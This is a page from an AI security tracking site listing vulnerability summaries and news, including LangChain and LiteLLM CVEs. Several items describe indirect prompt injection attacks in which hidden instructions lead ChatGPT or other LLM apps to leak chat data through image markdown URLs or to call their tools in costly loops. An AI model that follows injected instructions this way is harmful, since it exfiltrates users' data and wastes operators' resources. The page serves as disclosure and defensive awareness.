aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingFriday, May 8, 2026
>

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

>

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

Latest Intel

page 314/371
VIEW ALL
01

CVE-2023-32786: In Langchain through 0.0.155, prompt injection allows an attacker to force the service to retrieve data from an arbitrar

security
Oct 20, 2023

CVE-2023-32786 is a prompt injection vulnerability (tricking an AI by hiding instructions in its input) in Langchain version 0.0.155 and earlier that allows attackers to force the service to retrieve data from any URL they choose. This could lead to SSRF (server-side request forgery, where an attacker makes a server request data from unintended locations) and potentially inject harmful content into tasks that use the retrieved data.

>

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

>

Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely-trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.

NVD/CVE Database
02

Google Cloud Vertex AI - Data Exfiltration Vulnerability Fixed in Generative AI Studio

security
Oct 19, 2023

Google Cloud's Vertex AI Generative AI Studio had a data exfiltration vulnerability caused by image markdown injection (a technique where attackers embed hidden commands in image references to steal data). The vulnerability was responsibly disclosed to Google and has been fixed.

Embrace The Red
03

CVE-2023-46229: LangChain before 0.0.317 allows SSRF via document_loaders/recursive_url_loader.py because crawling can proceed from an e

security
Oct 19, 2023

LangChain versions before 0.0.317 have a vulnerability called SSRF (server-side request forgery, where an attacker tricks the application into making requests to unintended servers) in its recursive URL loader component. The flaw allows web crawling to move from an external server to an internal server that should not be accessible.

Fix: Update LangChain to version 0.0.317 or later. Patches are available at https://github.com/langchain-ai/langchain/commit/9ecb7240a480720ec9d739b3877a52f76098a2b8 and https://github.com/langchain-ai/langchain/pull/11925.

NVD/CVE Database
04

CVE-2023-45063: Cross-Site Request Forgery (CSRF) vulnerability in ReCorp AI Content Writing Assistant (Content Writer, GPT 3 & 4, ChatG

security
Oct 12, 2023

A CSRF vulnerability (cross-site request forgery, where an attacker tricks a user into performing unwanted actions on a website they're logged into) was found in the ReCorp AI Content Writing Assistant plugin for WordPress in versions 1.1.5 and earlier. This flaw could allow attackers to exploit users of the plugin without their knowledge.

NVD/CVE Database
05

CVE-2023-44467: langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-202

security
Oct 9, 2023

CVE-2023-44467 is a vulnerability in LangChain Experimental (a library for building AI applications) before version 0.0.306 that allows attackers to bypass a previous security fix and run arbitrary code (unauthorized commands) on a system using the __import__ function in Python, which the pal_chain/base.py file failed to block.

Fix: Upgrade LangChain to version 0.0.306 or later. A patch is available at https://github.com/langchain-ai/langchain/commit/4c97a10bd0d9385cfee234a63b5bd826a295e483.

NVD/CVE Database
06

Microsoft Fixes Data Exfiltration Vulnerability in Azure AI Playground

security
Sep 29, 2023

LLM applications like chatbots are vulnerable to data exfiltration (unauthorized data theft) through image markdown injection, a technique where attackers embed hidden instructions in untrusted data to make the AI generate image tags that leak information. Microsoft patched this vulnerability in Azure AI Playground, though the source does not describe the specific technical details of their fix.

Embrace The Red
07

CVE-2023-43654: TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper

security
Sep 28, 2023

TorchServe (a tool for running PyTorch machine learning models as web services) has a vulnerability in its default configuration that fails to validate user inputs properly, allowing attackers to download files from any URL and save them to the server's disk. This could let attackers damage the system or steal sensitive information, affecting versions 0.1.0 through 0.8.1.

Fix: Upgrade to TorchServe release 0.8.2 or later, which includes a warning when the default value for allowed_urls is used. Users should also configure the allowed_urls setting and specify which model URLs are permitted.

NVD/CVE Database
08

Advanced Data Exfiltration Techniques with ChatGPT

security
Sep 28, 2023

An indirect prompt injection attack (tricking an AI into following hidden instructions in its input) can allow an attacker to steal chat data from ChatGPT users by either having the AI embed information into image URLs (image markdown injection, which embeds data into web links displayed as images) or convincing users to click malicious links. ChatGPT Plugins, which are add-ons that extend ChatGPT's functionality, create additional exfiltration risks because they have minimal security review before being deployed.

Embrace The Red
09

HITCON CMT 2023 - LLM Security Presentation and Trip Report

securityresearch
Sep 18, 2023

This article is a trip report from HITCON CMT 2023, a security conference in Taiwan, where the author attended talks on various topics including LLM security, reverse engineering with AI, and application exploits. Key presentations covered indirect prompt injections (attacks where malicious instructions are hidden in data fed to an AI system), Electron app vulnerabilities, and PHP security issues. The author gave a talk on indirect prompt injections and notes this technique could become a significant attack vector for AI-integrated applications like chatbots.

Embrace The Red
10

LLM Apps: Don't Get Stuck in an Infinite Loop! 💵💰

securitysafety
Sep 16, 2023

An attacker can use indirect prompt injection (tricking an AI by hiding malicious instructions in data it reads) to make an LLM call its own tools or plugins repeatedly in a loop, potentially increasing costs or disrupting service. While ChatGPT users are mostly protected by subscription pricing, call limits, and a manual stop button, this technique demonstrates a real vulnerability in how LLM applications handle recursive tool calls.

Embrace The Red
Prev1...312313314315316...371Next